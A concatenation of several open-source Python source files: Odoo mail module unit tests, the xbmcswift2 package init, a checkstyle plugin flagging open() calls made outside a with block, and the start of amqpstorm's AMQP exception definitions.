self.assertEqual(_subject, msg.subject, 'message_post: mail.message subject incorrect')
self.assertEqual(_body1, msg.body, 'message_post: mail.message body incorrect')
# Test: mail_message: notified_partner_ids = group followers + partner_ids - author
test_pids = set([self.partner_admin_id, p_b_id, p_c_id])
self.assertEqual(test_pids, set(msg_pids), 'message_post: mail.message notified partners incorrect')
# Test: mail_message: attachments (4, attachment_ids + attachments)
test_aids = set([attach1_id, attach2_id])
msg_attach_names = set([attach.name for attach in msg.attachment_ids])
test_attach_names = set(['Attach1', 'Attach2', 'List1', 'List2'])
self.assertEqual(len(msg_aids), 4,
'message_post: mail.message wrong number of attachments')
self.assertEqual(msg_attach_names, test_attach_names,
'message_post: mail.message attachments incorrectly added')
self.assertTrue(test_aids.issubset(set(msg_aids)),
'message_post: mail.message attachments duplicated')
for attach in msg.attachment_ids:
self.assertEqual(attach.res_model, 'mail.group',
'message_post: mail.message attachments were not linked to the document')
self.assertEqual(attach.res_id, group_pigs.id,
'message_post: mail.message attachments were not linked to the document')
if 'List' in attach.name:
self.assertIn((attach.name, attach.datas.decode('base64')), _attachments,
'message_post: mail.message attachment name / data incorrect')
dl_attach = self.mail_message.download_attachment(cr, user_raoul.id, id_message=msg.id, attachment_id=attach.id)
self.assertIn((dl_attach['filename'], dl_attach['base64'].decode('base64')), _attachments,
'message_post: mail.message download_attachment is incorrect')
# Test: followers: same as before (author was already subscribed)
group_pigs.refresh()
group_fids = [follower.id for follower in group_pigs.message_follower_ids]
test_fids = new_follower_ids + [self.partner_admin_id]
self.assertEqual(set(test_fids), set(group_fids),
'message_post: wrong followers after posting')
# Test: mail_mail: notifications have been deleted
self.assertFalse(self.mail_mail.search(cr, uid, [('mail_message_id', '=', msg1_id)]),
'message_post: mail.mail notifications should have been auto-deleted!')
# Test: notifications emails: to a and b, c is email only, r is author
test_emailto = ['Administrator <a@a>', 'Bert Tartopoils <b@b>']
# test_emailto = ['"Followers of -Pigs-" <a@a>', '"Followers of -Pigs-" <b@b>']
self.assertEqual(len(sent_emails), 2,
'message_post: notification emails wrong number of send emails')
self.assertEqual(set([m['email_to'][0] for m in sent_emails]), set(test_emailto),
'message_post: notification emails wrong recipients (email_to)')
for sent_email in sent_emails:
self.assertEqual(sent_email['email_from'], 'Raoul Grosbedon <[email protected]>',
'message_post: notification email wrong email_from: should use alias of sender')
self.assertEqual(len(sent_email['email_to']), 1,
'message_post: notification email sent to more than one email address instead of a precise partner')
self.assertIn(sent_email['email_to'][0], test_emailto,
'message_post: notification email email_to incorrect')
self.assertEqual(sent_email['reply_to'], u'"YourCompany \\"Pigs\\" !ù $%-" <[email protected]>',
'message_post: notification email reply_to incorrect')
self.assertEqual(_subject, sent_email['subject'],
'message_post: notification email subject incorrect')
self.assertIn(_body1, sent_email['body'],
'message_post: notification email body incorrect')
self.assertIn('Pigs rules', sent_email['body_alternative'],
'message_post: notification email body alternative should contain the body')
self.assertNotIn('<p>', sent_email['body_alternative'],
'message_post: notification email body alternative still contains html')
self.assertFalse(sent_email['references'],
'message_post: references should be False when sending a message that is not a reply')
# Test: notification linked to this message = group followers = notified_partner_ids
notif_ids = self.mail_notification.search(cr, uid, [('message_id', '=', msg1_id)])
notif_pids = set([notif.partner_id.id for notif in self.mail_notification.browse(cr, uid, notif_ids)])
self.assertEqual(notif_pids, test_pids,
'message_post: mail.message created mail.notification incorrect')
# Data: Pigs name back to normal
self.mail_group.write(cr, uid, [self.group_pigs_id], {'name': 'Pigs'})
# --------------------------------------------------
# CASE2: reply + parent_id + parent notification
# --------------------------------------------------
# Data: remove alias_domain to see emails with alias
param_ids = self.registry('ir.config_parameter').search(cr, uid, [('key', '=', 'mail.catchall.domain')])
self.registry('ir.config_parameter').unlink(cr, uid, param_ids)
# Do: Raoul message_post on Pigs
self._init_mock_build_email()
msg2_id = self.mail_group.message_post(cr, user_raoul.id, self.group_pigs_id,
body=_body2, type='email', subtype='mt_comment',
partner_ids=[p_d_id], parent_id=msg1_id, attachment_ids=[attach3_id],
context={'mail_post_autofollow': True})
msg = self.mail_message.browse(cr, uid, msg2_id)
msg_pids = [partner.id for partner in msg.notified_partner_ids]
msg_aids = [attach.id for attach in msg.attachment_ids]
sent_emails = self._build_email_kwargs_list
# Test: mail_message: subject is False, body, parent_id is msg_id
self.assertEqual(msg.subject, False, 'message_post: mail.message subject incorrect')
self.assertEqual(msg.body, html_sanitize(_body2), 'message_post: mail.message body incorrect')
self.assertEqual(msg.parent_id.id, msg1_id, 'message_post: mail.message parent_id incorrect')
# Test: mail_message: notified_partner_ids = group followers
test_pids = [self.partner_admin_id, p_d_id]
self.assertEqual(set(test_pids), set(msg_pids), 'message_post: mail.message partners incorrect')
# Test: mail_message: notifications linked to this message = group followers = notified_partner_ids
notif_ids = self.mail_notification.search(cr, uid, [('message_id', '=', msg2_id)])
notif_pids = [notif.partner_id.id for notif in self.mail_notification.browse(cr, uid, notif_ids)]
self.assertEqual(set(test_pids), set(notif_pids), 'message_post: mail.message notification partners incorrect')
# Test: mail_mail: notifications deleted
self.assertFalse(self.mail_mail.search(cr, uid, [('mail_message_id', '=', msg2_id)]), 'mail.mail notifications should have been auto-deleted!')
# Test: emails send by server (to a, b, c, d)
test_emailto = [u'Administrator <a@a>', u'Bert Tartopoils <b@b>', u'Carine Poilvache <c@c>', u'D\xe9d\xe9 Grosbedon <d@d>']
# test_emailto = [u'"Followers of Pigs" <a@a>', u'"Followers of Pigs" <b@b>', u'"Followers of Pigs" <c@c>', u'"Followers of Pigs" <d@d>']
# self.assertEqual(len(sent_emails), 3, 'sent_email number of sent emails incorrect')
for sent_email in sent_emails:
self.assertEqual(sent_email['email_from'], 'Raoul Grosbedon <r@r>',
'message_post: notification email wrong email_from: should use email of sender when no alias domain set')
self.assertEqual(len(sent_email['email_to']), 1,
'message_post: notification email sent to more than one email address instead of a precise partner')
self.assertIn(sent_email['email_to'][0], test_emailto,
'message_post: notification email email_to incorrect')
self.assertEqual(email_split(sent_email['reply_to']), ['r@r'], # was '"Followers of Pigs" <r@r>', but makes no sense
'message_post: notification email reply_to incorrect: should have raoul email')
self.assertEqual(_mail_subject, sent_email['subject'],
'message_post: notification email subject incorrect')
self.assertIn(html_sanitize(_body2), sent_email['body'],
'message_post: notification email does not contain the body')
self.assertIn('Pigs rocks', sent_email['body_alternative'],
'message_post: notification email body alternative should contain the body')
self.assertNotIn('<p>', sent_email['body_alternative'],
'message_post: notification email body alternative still contains html')
self.assertIn(msg_message_id, sent_email['references'],
'message_post: notification email references lacks parent message message_id')
# Test: attachments + download
for attach in msg.attachment_ids:
self.assertEqual(attach.res_model, 'mail.group',
'message_post: mail.message attachment res_model incorrect')
self.assertEqual(attach.res_id, self.group_pigs_id,
'message_post: mail.message attachment res_id incorrect')
# Test: Dédé has been notified -> should also have been notified of the parent message
msg = self.mail_message.browse(cr, uid, msg1_id)
msg_pids = set([partner.id for partner in msg.notified_partner_ids])
test_pids = set([self.partner_admin_id, p_b_id, p_c_id, p_d_id])
self.assertEqual(test_pids, msg_pids, 'message_post: mail.message parent notification not created')
# Do: reply to last message
msg3_id = self.mail_group.message_post(cr, user_raoul.id, self.group_pigs_id, body='Test', parent_id=msg2_id)
msg = self.mail_message.browse(cr, uid, msg3_id)
# Test: check that its parent will be the first message
self.assertEqual(msg.parent_id.id, msg1_id, 'message_post did not flatten the thread structure')
def test_25_message_compose_wizard(self):
""" Tests designed for the mail.compose.message wizard. """
cr, uid, user_raoul, group_pigs = self.cr, self.uid, self.user_raoul, self.group_pigs
mail_compose = self.registry('mail.compose.message')
# --------------------------------------------------
# Data creation
# --------------------------------------------------
# 0 - Update existing users-partners
self.res_users.write(cr, uid, [uid], {'email': 'a@a'})
self.res_users.write(cr, uid, [self.user_raoul_id], {'email': 'r@r'})
# 1 - Bert Tartopoils, with email, should receive emails for comments and emails
p_b_id = self.res_partner.create(cr, uid, {'name': 'Bert Tartopoils', 'email': 'b@b'})
# 2 - Carine Poilvache, with email, should receive emails for emails
p_c_id = self.res_partner.create(cr, uid, {'name': 'Carine Poilvache', 'email': 'c@c', 'notify_email': 'always'})
# 3 - Dédé Grosbedon, without email, to test email verification; should receive emails for every message
p_d_id = self.res_partner.create(cr, uid, {'name': 'Dédé Grosbedon', 'email': 'd@d', 'notify_email': 'always'})
# 4 - Create a Bird mail.group, that will be used to test mass mailing
group_bird_id = self.mail_group.create(cr, uid,
{
'name': 'Bird',
'description': 'Bird resistance',
}, context={'mail_create_nolog': True})
group_bird = self.mail_group.browse(cr, uid, group_bird_id)
# 5 - Mail data
_subject = 'Pigs'
_body = 'Pigs <b>rule</b>'
_reply_subject = 'Re: %s' % _subject
_attachments = [
{'name': 'First', 'datas_fname': 'first.txt', 'datas': 'My first attachment'.encode('base64')},
{'name': 'Second', 'datas_fname': 'second.txt', 'datas': 'My second attachment'.encode('base64')}
]
_attachments_test = [('first.txt', 'My first attachment'), ('second.txt', 'My second attachment')]
# 6 - Subscribe Bert to Pigs
group_pigs.message_subscribe([p_b_id])
# --------------------------------------------------
# CASE1: wizard + partners + context keys
# --------------------------------------------------
# Do: Raoul wizard-composes on Pigs with auto-follow for partners, not for author
compose_id = mail_compose.create(cr, user_raoul.id,
{
'subject': _subject,
'body': _body,
'partner_ids': [(4, p_c_id), (4, p_d_id)],
}, context={
'default_composition_mode': 'comment',
'default_model': 'mail.group',
'default_res_id': self.group_pigs_id,
})
compose = mail_compose.browse(cr, uid, compose_id)
# Test: mail.compose.message: composition_mode, model, res_id
self.assertEqual(compose.composition_mode, 'comment', 'compose wizard: mail.compose.message incorrect composition_mode')
self.assertEqual(compose.model, 'mail.group', 'compose wizard: mail.compose.message incorrect model')
self.assertEqual(compose.res_id, self.group_pigs_id, 'compose wizard: mail.compose.message incorrect res_id')
# Do: Post the comment
mail_compose.send_mail(cr, user_raoul.id, [compose_id], {'mail_post_autofollow': True, 'mail_create_nosubscribe': True})
group_pigs.refresh()
message = group_pigs.message_ids[0]
# Test: mail.group: followers (c and d added by auto follow key; raoul not added by nosubscribe key)
pigs_pids = [p.id for p in group_pigs.message_follower_ids]
test_pids = [self.partner_admin_id, p_b_id, p_c_id, p_d_id]
self.assertEqual(set(pigs_pids), set(test_pids),
'compose wizard: mail_post_autofollow and mail_create_nosubscribe context keys not correctly taken into account')
# Test: mail.message: subject, body inside p
self.assertEqual(message.subject, _subject, 'compose wizard: mail.message incorrect subject')
self.assertEqual(message.body, '<p>%s</p>' % _body, 'compose wizard: mail.message incorrect body')
# Test: mail.message: notified_partner_ids = admin + bert (followers) + c + d (recipients)
msg_pids = [partner.id for partner in message.notified_partner_ids]
test_pids = [self.partner_admin_id, p_b_id, p_c_id, p_d_id]
self.assertEqual(set(msg_pids), set(test_pids),
'compose wizard: mail.message notified_partner_ids incorrect')
# --------------------------------------------------
# CASE2: reply + attachments
# --------------------------------------------------
# Do: Reply with attachments
compose_id = mail_compose.create(cr, user_raoul.id,
{
'attachment_ids': [(0, 0, _attachments[0]), (0, 0, _attachments[1])]
}, context={
'default_composition_mode': 'comment',
'default_res_id': self.group_pigs_id,
'default_parent_id': message.id
})
compose = mail_compose.browse(cr, uid, compose_id)
# Test: mail.compose.message: model, res_id, parent_id
self.assertEqual(compose.model, 'mail.group', 'compose wizard: mail.compose.message incorrect model')
self.assertEqual(compose.res_id, self.group_pigs_id, 'compose wizard: mail.compose.message incorrect res_id')
self.assertEqual(compose.parent_id.id, message.id, 'compose wizard: mail.compose.message incorrect parent_id')
# Test: mail.compose.message: subject as Re:.., body, parent_id
self.assertEqual(compose.subject, _reply_subject, 'compose wizard: mail.compose.message incorrect subject')
self.assertFalse(compose.body, 'compose wizard: mail.compose.message body should not contain parent message body')
self.assertEqual(compose.parent_id and compose.parent_id.id, message.id, 'compose wizard: mail.compose.message parent_id incorrect')
# Test: mail.compose.message: attachments
for attach in compose.attachment_ids:
self.assertIn((attach.datas_fname, attach.datas.decode('base64')), _attachments_test,
'compose wizard: mail.message attachment name / data incorrect')
# --------------------------------------------------
# CASE3: mass_mail on Pigs and Bird
# --------------------------------------------------
# Do: Compose in mass_mail_mode on pigs and bird
compose_id = mail_compose.create(
cr, user_raoul.id, {
'subject': _subject,
'body': '${object.description}',
'partner_ids': [(4, p_c_id), (4, p_d_id)],
}, context={
'default_composition_mode': 'mass_mail',
'default_model': 'mail.group',
'default_res_id': False,
'active_ids': [self.group_pigs_id, group_bird_id],
})
compose = mail_compose.browse(cr, uid, compose_id)
# Do: Post the comment, get created message for each group
mail_compose.send_mail(cr, user_raoul.id, [compose_id], context={
'default_res_id': -1,
'active_ids': [self.group_pigs_id, group_bird_id]
})
# check mail_mail
mail_mail_ids = self.mail_mail.search(cr, uid, [('subject', '=', _subject)])
for mail_mail in self.mail_mail.browse(cr, uid, mail_mail_ids):
self.assertEqual(set([p.id for p in mail_mail.recipient_ids]), set([p_c_id, p_d_id]),
'compose wizard: mail_mail mass mailing: mail.mail in mass mail incorrect recipients')
# check logged messages
group_pigs.refresh()
group_bird.refresh()
message1 = group_pigs.message_ids[0]
message2 = group_bird.message_ids[0]
# Test: Pigs and Bird did receive their message
test_msg_ids = self.mail_message.search(cr, uid, [], limit=2)
self.assertIn(message1.id, test_msg_ids, 'compose wizard: Pigs did not receive its mass mailing message')
self.assertIn(message2.id, test_msg_ids, 'compose wizard: Bird did not receive its mass mailing message')
# Test: mail.message: subject, body, subtype, notified partners (nobody + specific recipients)
self.assertEqual(message1.subject, _subject,
'compose wizard: message_post: mail.message in mass mail subject incorrect')
self.assertEqual(message1.body, '<p>%s</p>' % group_pigs.description,
'compose wizard: message_post: mail.message in mass mail body incorrect')
# self.assertEqual(set([p.id for p in message1.notified_partner_ids]), set([p_c_id, p_d_id]),
# 'compose wizard: message_post: mail.message in mass mail incorrect notified partners')
self.assertEqual(message2.subject, _subject,
'compose wizard: message_post: mail.message in mass mail subject incorrect')
self.assertEqual(message2.body, '<p>%s</p>' % group_bird.description,
'compose wizard: message_post: mail.message in mass mail body incorrect')
# self.assertEqual(set([p.id for p in message2.notified_partner_ids]), set([p_c_id, p_d_id]),
# 'compose wizard: message_post: mail.message in mass mail incorrect notified partners')
# Test: mail.group followers: author not added as follower in mass mail mode
pigs_pids = [p.id for p in group_pigs.message_follower_ids]
test_pids = [self.partner_admin_id, p_b_id, p_c_id, p_d_id]
self.assertEqual(set(pigs_pids), set(test_pids),
'compose wizard: mail_post_autofollow and mail_create_nosubscribe context keys not correctly taken into account')
bird_pids = [p.id for p in group_bird.message_follower_ids]
test_pids = [self.partner_admin_id]
self.assertEqual(set(bird_pids), set(test_pids),
'compose wizard: mail_post_autofollow and mail_create_nosubscribe context keys not correctly taken into account')
# Do: Compose in mass_mail, coming from list_view, we have an active_domain that should be supported
compose_id = mail_compose.create(cr, user_raoul.id,
{
'subject': _subject,
'body': '${object.description}',
'partner_ids': [(4, p_c_id), (4, p_d_id)],
}, context={
'default_composition_mode': 'mass_mail',
'default_model': 'mail.group',
'default_res_id': False,
'active_ids': [self.group_pigs_id],
'active_domain': [('name', 'in', ['Pigs', 'Bird'])],
})
compose = mail_compose.browse(cr, uid, compose_id)
# Do: Post the comment, get created message for each group
mail_compose.send_mail(
cr, user_raoul.id, [compose_id], context={
'default_res_id': -1,
'active_ids': [self.group_pigs_id, group_bird_id]
})
group_pigs.refresh()
group_bird.refresh()
message1 = group_pigs.message_ids[0]
message2 = group_bird.message_ids[0]
# Test: Pigs and Bird did receive their message
test_msg_ids = self.mail_message.search(cr, uid, [], limit=2)
self.assertIn(message1.id, test_msg_ids, 'compose wizard: Pigs did not receive its mass mailing message')
self.assertIn(message2.id, test_msg_ids, 'compose wizard: Bird did not receive its mass mailing message')
def test_30_needaction(self):
""" Tests for mail.message needaction. """
cr, uid, user_admin, user_raoul, group_pigs = self.cr, self.uid, self.user_admin, self.user_raoul, self.group_pigs
na_admin_base = self.mail_message._needaction_count(cr, uid, domain=[])
na_demo_base = self.mail_message._needaction_count(cr, user_raoul.id, domain=[])
# Test: number of unread notification = needaction on mail.message
notif_ids = self.mail_notification.search(cr, uid, [
('partner_id', '=', user_admin.partner_id.id),
('is_read', '=', False)
])
na_count = self.mail_message._needaction_count(cr, uid, domain=[])
self.assertEqual(len(notif_ids), na_count, 'unread notifications count does not match needaction count')
# Do: post 2 message on group_pigs as admin, 3 messages as demo user
for dummy in range(2):
group_pigs.message_post(body='My Body', subtype='mt_comment')
raoul_pigs = group_pigs.sudo(user_raoul)
for dummy in range(3):
raoul_pigs.message_post(body='My Demo Body', subtype='mt_comment')
# Test: admin has 3 new notifications (from demo), and 3 new needaction
notif_ids = self.mail_notification.search(cr, uid, [
('partner_id', '=', user_admin.partner_id.id),
('is_read', '=', False)
])
self.assertEqual(len(notif_ids), na_admin_base + 3, 'Admin should have 3 new unread notifications')
na_admin = self.mail_message._needaction_count(cr, uid, domain=[])
na_admin_group = self.mail_message._needaction_count(cr, uid, domain=[('model', '=', 'mail.group'), ('res_id', '=', self.group_pigs_id)])
self.assertEqual(na_admin, na_admin_base + 3, 'Admin should have 3 new needaction')
self.assertEqual(na_admin_group, 3, 'Admin should have 3 needaction related to Pigs')
# Test: demo has 0 new notifications (not a follower, not receiving its own messages), and 0 new needaction
notif_ids = self.mail_notification.search(cr, uid, [
('partner_id', '=', user_raoul.partner_id.id),
('is_read', '=', False)
])
self.assertEqual(len(notif_ids), na_demo_base + 0, 'Demo should have 0 new unread notifications')
na_demo = self.mail_message._needaction_count(cr, user_raoul.id, domain=[])
na_demo_group = self.mail_message._needaction_count(cr, user_raoul.id, domain=[('model', '=', 'mail.group'), ('res_id', '=', self.group_pigs_id)])
self.assertEqual(na_demo, na_demo_base + 0, 'Demo should have 0 new needaction')
self.assertEqual(na_demo_group, 0, 'Demo should have 0 needaction related to Pigs')
def test_40_track_field(self):
""" Testing auto tracking of fields. """
def _strip_string_spaces(body):
return body.replace(' ', '').replace('\n', '')
# Data: subscribe Raoul to Pigs, because he will change the public attribute and may loose access to the record
cr, uid = self.cr, self.uid
self.mail_group.message_subscribe_users(cr, uid, [self.group_pigs_id], [self.user_raoul_id])
# Data: res.users.group, to test group_public_id automatic logging
group_system_ref = self.registry('ir.model.data').get_object_reference(cr, uid, 'base', 'group_system')
group_system_id = group_system_ref and group_system_ref[1] or False
# Data: custom subtypes
mt_private_id = self.mail_message_subtype.create(cr, uid, {'name': 'private', 'description': 'Private public'})
self.ir_model_data.create(cr, uid, {'name': 'mt_private', 'model': 'mail.message.subtype', 'module': 'mail', 'res_id': mt_private_id})
mt_name_supername_id = self.mail_message_subtype.create(cr, uid, {'name': 'name_supername', 'description': 'Supername name'})
self.ir_model_data.create(cr, uid, {'name': 'mt_name_supername', 'model': 'mail.message.subtype', 'module': 'mail', 'res_id': mt_name_supername_id})
mt_group_public_set_id = self.mail_message_subtype.create(cr, uid, {'name': 'group_public_set', 'description': 'Group set'})
self.ir_model_data.create(cr, uid, {'name': 'mt_group_public_set', 'model': 'mail.message.subtype', 'module': 'mail', 'res_id': mt_group_public_set_id})
mt_group_public_id = self.mail_message_subtype.create(cr, uid, {'name': 'group_public', 'description': 'Group changed'})
self.ir_model_data.create(cr, uid, {'name': 'mt_group_public', 'model': 'mail.message.subtype', 'module': 'mail', 'res_id': mt_group_public_id})
# Data: alter mail_group model for testing purposes (test on classic, selection and many2one fields)
cls = type(self.mail_group)
self.assertNotIn('_track', cls.__dict__)
cls._track = {
'public': {
'mail.mt_private': lambda self, cr, uid, obj, ctx=None: obj.public == 'private',
},
'name': {
'mail.mt_name_supername': lambda self, cr, uid, obj, ctx=None: obj.name == 'supername',
},
'group_public_id': {
'mail.mt_group_public_set': lambda self, cr, uid, obj, ctx=None: obj.group_public_id,
'mail.mt_group_public': lambda self, cr, uid, obj, ctx=None: True,
},
}
visibility = {'public': 'onchange', 'name': 'always', 'group_public_id': 'onchange'}
for key in visibility:
self.assertFalse(hasattr(getattr(cls, key), 'track_visibility'))
getattr(cls, key).track_visibility = visibility[key]
@self.addCleanup
def cleanup():
delattr(cls, '_track')
for key in visibility:
del getattr(cls, key).track_visibility
# Test: change name -> always tracked, not related to a subtype
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'public': 'public'})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 1, 'tracked: a message should have been produced')
# Test: first produced message: no subtype, name change tracked
last_msg = self.group_pigs.message_ids[-1]
self.assertFalse(last_msg.subtype_id, 'tracked: message should not have been linked to a subtype')
self.assertIn(u'SelectedGroupOnly\u2192Public', _strip_string_spaces(last_msg.body), 'tracked: message body incorrect')
self.assertIn('Pigs', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold always tracked field')
# Test: change name as supername, public as private -> 2 subtypes
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'name': 'supername', 'public': 'private'})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 3, 'tracked: two messages should have been produced')
# Test: first produced message: mt_name_supername
last_msg = self.group_pigs.message_ids[-2]
self.assertEqual(last_msg.subtype_id.id, mt_private_id, 'tracked: message should be linked to mt_private subtype')
self.assertIn('Private public', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Pigs\u2192supername', _strip_string_spaces(last_msg.body), 'tracked: message body incorrect')
# Test: second produced message: mt_name_supername
last_msg = self.group_pigs.message_ids[-3]
self.assertEqual(last_msg.subtype_id.id, mt_name_supername_id, 'tracked: message should be linked to mt_name_supername subtype')
self.assertIn('Supername name', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Public\u2192Private', _strip_string_spaces(last_msg.body), 'tracked: message body incorrect')
self.assertIn(u'Pigs\u2192supername', _strip_string_spaces(last_msg.body), 'tracked feature: message body does not hold always tracked field')
# Test: change public as public, group_public_id -> 2 subtypes, name always tracked
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'public': 'public', 'group_public_id': group_system_id})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 5, 'tracked: one message should have been produced')
# Test: first produced message: mt_group_public_set_id, with name always tracked, public tracked on change
last_msg = self.group_pigs.message_ids[-4]
self.assertEqual(last_msg.subtype_id.id, mt_group_public_set_id, 'tracked: message should be linked to mt_group_public_set_id')
self.assertIn('Group set', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Private\u2192Public', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold changed tracked field')
self.assertIn(u'HumanResources/Employee\u2192Administration/Settings', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold always tracked field')
# Test: second produced message: mt_group_public_id, with name always tracked, public tracked on change
last_msg = self.group_pigs.message_ids[-5]
self.assertEqual(last_msg.subtype_id.id, mt_group_public_id, 'tracked: message should be linked to mt_group_public_id')
self.assertIn('Group changed', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Private\u2192Public', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold changed tracked field')
self.assertIn(u'HumanResources/Employee\u2192Administration/Settings', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold always tracked field')
# Test: change group_public_id to False -> 1 subtype, name always tracked
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'group_public_id': False})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 6, 'tracked: one message should have been produced')
# Test: first produced message: mt_group_public_set_id, with name always tracked, public tracked on change
last_msg = self.group_pigs.message_ids[-6]
self.assertEqual(last_msg.subtype_id.id, mt_group_public_id, 'tracked: message should be linked to mt_group_public_id')
self.assertIn('Group changed', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Administration/Settings\u2192', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold always tracked field')
# Test: change not tracked field, no tracking message
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'description': 'Dummy'})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 6, 'tracked: No message should have been produced')
|
agpl-3.0
|
jbaiter/plugin.video.brmediathek
|
resources/lib/xbmcswift2/__init__.py
|
2
|
2442
|
'''
xbmcswift2
----------
A micro framework to enable rapid development of XBMC plugins.
:copyright: (c) 2012 by Jonathan Beluch
:license: GPLv3, see LICENSE for more details.
'''
from types import ModuleType
class module(ModuleType):
'''A wrapper class for a module used to override __getattr__. This class
will behave normally for any existing module attributes. For any attributes
which do not existi in in the wrapped module, a mock function will be
returned. This function will also return itself enabling multiple mock
function calls.
'''
def __init__(self, wrapped=None):
self.wrapped = wrapped
if wrapped:
self.__dict__.update(wrapped.__dict__)
def __getattr__(self, name):
'''Returns any existing attr for the wrapped module or returns a mock
function for anything else. Never raises an AttributeError.
'''
try:
return getattr(self.wrapped, name)
except AttributeError:
def func(*args, **kwargs):
'''A mock function which returns itself, enabling chainable
function calls.
'''
log.warning('The %s method has not been implented on the CLI. '
'Your code might not work properly when calling '
'it.', name)
return self
return func
try:
import xbmc
import xbmcgui
import xbmcplugin
import xbmcaddon
import xbmcvfs
CLI_MODE = False
except ImportError:
CLI_MODE = True
import sys
from logger import log
# Mock the XBMC modules
from mockxbmc import xbmc, xbmcgui, xbmcplugin, xbmcaddon, xbmcvfs
xbmc = module(xbmc)
xbmcgui = module(xbmcgui)
xbmcplugin = module(xbmcplugin)
xbmcaddon = module(xbmcaddon)
xbmcvfs = module(xbmcvfs)
from xbmcswift2.storage import TimedStorage
from xbmcswift2.request import Request
from xbmcswift2.common import (xbmc_url, enum, clean_dict, pickle_dict,
unpickle_args, unpickle_dict, download_page, unhex)
from xbmcswift2.constants import SortMethod, VIEW_MODES
from xbmcswift2.listitem import ListItem
from xbmcswift2.logger import setup_log
from xbmcswift2.module import Module
from xbmcswift2.urls import AmbiguousUrlException, NotFoundException, UrlRule
from xbmcswift2.xbmcmixin import XBMCMixin
from xbmcswift2.plugin import Plugin
|
gpl-3.0
|
jsirois/commons
|
src/python/twitter/checkstyle/plugins/missing_contextmanager.py
|
14
|
1726
|
# ==================================================================================================
# Copyright 2014 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
# TODO(wickman)
#
# 1. open(foo) should always be done in a with context.
#
# 2. if you see acquire/release on the same variable in a particular ast
# body, warn about context manager use.
import ast
from ..common import CheckstylePlugin
class MissingContextManager(CheckstylePlugin):
"""Recommend the use of contextmanagers when it seems appropriate."""
def nits(self):
with_contexts = set(self.iter_ast_types(ast.With))
with_context_calls = set(node.context_expr for node in with_contexts
if isinstance(node.context_expr, ast.Call))
for call in self.iter_ast_types(ast.Call):
if isinstance(call.func, ast.Name) and call.func.id == 'open' and (
call not in with_context_calls):
yield self.warning('T802', 'open() calls should be made within a contextmanager.', call)
|
apache-2.0
|
eandersson/amqp-storm
|
amqpstorm/exception.py
|
2
|
4462
|
"""AMQPStorm Exception."""
AMQP_ERROR_MAPPING = {
311: ('CONTENT-TOO-LARGE',
'The client attempted to transfer content larger than the '
'server could accept at the present time. The client may '
'retry at a later time.'),
312: ('NO-ROUTE', 'Undocumented AMQP Soft Error'),
313: ('NO-CONSUMERS',
'When the exchange cannot deliver to a consumer when the '
'immediate flag is set. As a result of pending data on '
'the queue or the absence of any consumers of the queue.'),
320: ('CONNECTION-FORCED',
'An operator intervened to close the connection for some reason. '
'The client may retry at some later date.'),
402: ('INVALID-PATH',
'The client tried to work with an unknown virtual host.'),
403: ('ACCESS-REFUSED',
'The client attempted to work with a server entity to which '
'has no access due to security settings.'),
404: ('NOT-FOUND',
'The client attempted to work with a server '
'entity that does not exist.'),
405: ('RESOURCE-LOCKED',
'The client attempted to work with a server entity to which it '
'has no access because another client is working with it.'),
406: ('PRECONDITION-FAILED',
'The client requested a method that was not '
'allowed because some precondition failed.'),
501: ('FRAME-ERROR',
'The sender sent a malformed frame that the recipient could '
'not decode. This strongly implies a programming error in '
'the sending peer.'),
502: ('SYNTAX-ERROR',
'The sender sent a frame that contained illegal values for '
'one or more fields. This strongly implies a programming '
'error in the sending peer.'),
503: ('COMMAND-INVALID',
'The client sent an invalid sequence of frames, attempting to '
'perform an operation that was considered invalid by the server. '
'This usually implies a programming error in the client.'),
504: ('CHANNEL-ERROR',
'The client attempted to work with a channel that had not '
'been correctly opened. This most likely indicates a '
'fault in the client layer.'),
505: ('UNEXPECTED-FRAME',
'The peer sent a frame that was not expected, usually in the '
'context of a content header and body. This strongly '
'indicates a fault in the peer\'s content processing.'),
506: ('RESOURCE-ERROR',
'The server could not complete the method because it lacked '
'sufficient resources. This may be due to the client '
'creating too many of some type of entity.'),
530: ('NOT-ALLOWED',
'The client tried to work with some entity in a manner '
'that is prohibited by the server, due to security '
'settings or by some other criteria.'),
540: ('NOT-IMPLEMENTED',
'The client tried to use functionality that is '
'notimplemented in the server.'),
541: ('INTERNAL-ERROR',
'The server could not complete the method because of an '
'internal error. The server may require intervention by '
'an operator in order to resume normal operations.')
}
class AMQPError(IOError):
"""General AMQP Error"""
_documentation = None
_error_code = None
_error_type = None
@property
def documentation(self):
"""AMQP Documentation string."""
return self._documentation or bytes()
@property
def error_code(self):
"""AMQP Error Code - A 3-digit reply code."""
return self._error_code
@property
def error_type(self):
"""AMQP Error Type e.g. NOT-FOUND."""
return self._error_type
def __init__(self, *args, **kwargs):
self._error_code = kwargs.pop('reply_code', None)
